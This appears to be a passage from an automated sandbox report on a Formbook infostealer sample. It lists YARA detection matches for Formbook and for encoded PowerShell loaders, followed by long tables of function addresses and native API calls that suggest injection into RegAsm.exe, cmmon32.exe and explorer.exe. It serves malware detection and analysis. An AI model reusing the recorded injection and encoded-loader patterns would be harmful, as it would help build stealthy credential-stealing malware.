          Source: 00000017.00000002.955473010.00000000009F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000017.00000002.955473010.00000000009F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000015.00000002.610838072.00000282491DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000015.00000002.610838072.00000282491DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.502402216.0000012FD8108000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
          Source: 00000006.00000002.502402216.0000012FD8108000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.502402216.0000012FD8108000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: powershell.exe PID: 7076, type: MEMORYSTRMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
          Source: Process Memory Space: powershell.exe PID: 7076, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: Process Memory Space: powershell.exe PID: 6384, type: MEMORYSTRMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
          Source: Process Memory Space: powershell.exe PID: 6384, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: Process Memory Space: powershell.exe PID: 6508, type: MEMORYSTRMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF9F16F1DF8
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF9F16F1D70
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF9F16F1988
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF9F16F0C6B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040909B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004090A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00401209
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00402D88
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041D7DD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041CFAA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C322AE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B9EBB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C2DBD2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C203DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C32B28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B920A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B7B090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C328EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C320A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C21002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C3E824
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B84120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B6F900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C32EF7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B86E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C2D616
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C3DFCE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C31FF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C2D466
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B7841F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C325DD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B92581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B7D5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B60D20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C31D55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C32D07
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FF9F16E0CD0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FF9F16E0D30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0477841F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0482D466
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04760D20
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_048325DD
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04832D07
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0477D5E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04831D55
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04792581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04786E30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04832EF7
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0482D616
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0483DFCE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04831FF1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_048320A8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0478A830
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_048328EC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04821002
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0483E824
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047920A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0477B090
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04784120
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0476F900
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047899BF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_048322AE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0481FA2B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0478AB40
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0482DBD2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_048203DA
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04832B28
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0479EBB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_032090A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0320909B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0321CFAA
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_03202FB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_03202D88
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_03202D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0040909B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_004090A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_00401209
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_00402D88
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0041D7DD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0041CFAA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_03192B28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_030FEBB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0318DBD2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_031922AE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_030CF900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_030E4120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_03181002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0319E824
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_030DB090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_030F20A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_031920A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_031928EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_03191FF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0318D616
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_030E6E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_03192EF7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_03192D07
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_030C0D20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_03191D55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_030F2581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_031925DD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_030DD5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_030D841F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0318D466
          Source: C:\Windows\explorer.exeCode function: 37_2_0D3FC902
          Source: C:\Windows\explorer.exeCode function: 37_2_0D3FF302
          Source: C:\Windows\explorer.exeCode function: 37_2_0D403D02
          Source: C:\Windows\explorer.exeCode function: 37_2_0D402F06
          Source: C:\Windows\explorer.exeCode function: 37_2_0D3FD362
          Source: C:\Windows\explorer.exeCode function: 37_2_0D3FD359
          Source: C:\Windows\explorer.exeCode function: 37_2_0D4017B2
          Source: C:\Windows\explorer.exeCode function: 37_2_0D3FF2FF
          Source: C:\Windows\explorer.exeCode function: 37_2_0D3FC8FB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02B6B150 appears 45 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0041A960 appears 38 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 030CB150 appears 35 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0041AA90 appears 38 times
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 0476B150 appears 72 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00418AA0 NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00418B50 NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00418BD0 NtClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00418C80 NtAllocateVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00418A9A NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00418BCA NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BA9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BA9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BA9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BA98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BA9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BA9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BA99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BA9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BA96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BA9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BA97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BA9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BA9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BA9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BA95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BA9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BA9A80 NtOpenDirectoryObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BA9A10 NtQuerySection,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BAA3B0 NtGetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BA9B00 NtSetValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BA98A0 NtWriteVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BA9820 NtEnumerateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BAB040 NtSuspendThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BA99D0 NtCreateProcessEx,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BA9950 NtQueueApcThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BA96D0 NtCreateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BA9610 NtEnumerateValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BA9670 NtQueryInformationProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BA9650 NtQueryValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BA9730 NtQueryVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BAA710 NtOpenProcessToken,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BA9770 NtSetInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BAA770 NtOpenThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BA9760 NtOpenProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BA95F0 NtQueryInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BAAD30 NtSetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BA9520 NtWaitForSingleObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BA9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047A9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047A95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047A9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047A9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047A96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047A96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047A9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047A9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047A9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047A9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047A9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047A99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047A9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047A9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047AAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047A9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047A95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047A9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047A9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047AA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047A9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047A9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047A9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047AA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047A97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047AB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047A9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047A98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047A98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047A9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047A99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047A9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047A9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047A9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047A9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047A9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047AA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_03218B50 NtReadFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_03218BD0 NtClose,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_03218AA0 NtCreateFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_03218C80 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_03218BCA NtReadFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_03218A9A NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_00418AA0 NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_00418B50 NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_00418BD0 NtClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_00418C80 NtAllocateVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_00418A9A NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_00418BCA NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_03109910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_03109860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_03109FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_03109660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_031096E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_031095D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_03109B00 NtSetValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0310A3B0 NtGetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_03109A10 NtQuerySection,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_03109A00 NtProtectVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_03109A20 NtResumeThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_03109A50 NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_03109A80 NtOpenDirectoryObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_03109950 NtQueueApcThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_031099A0 NtCreateSection,
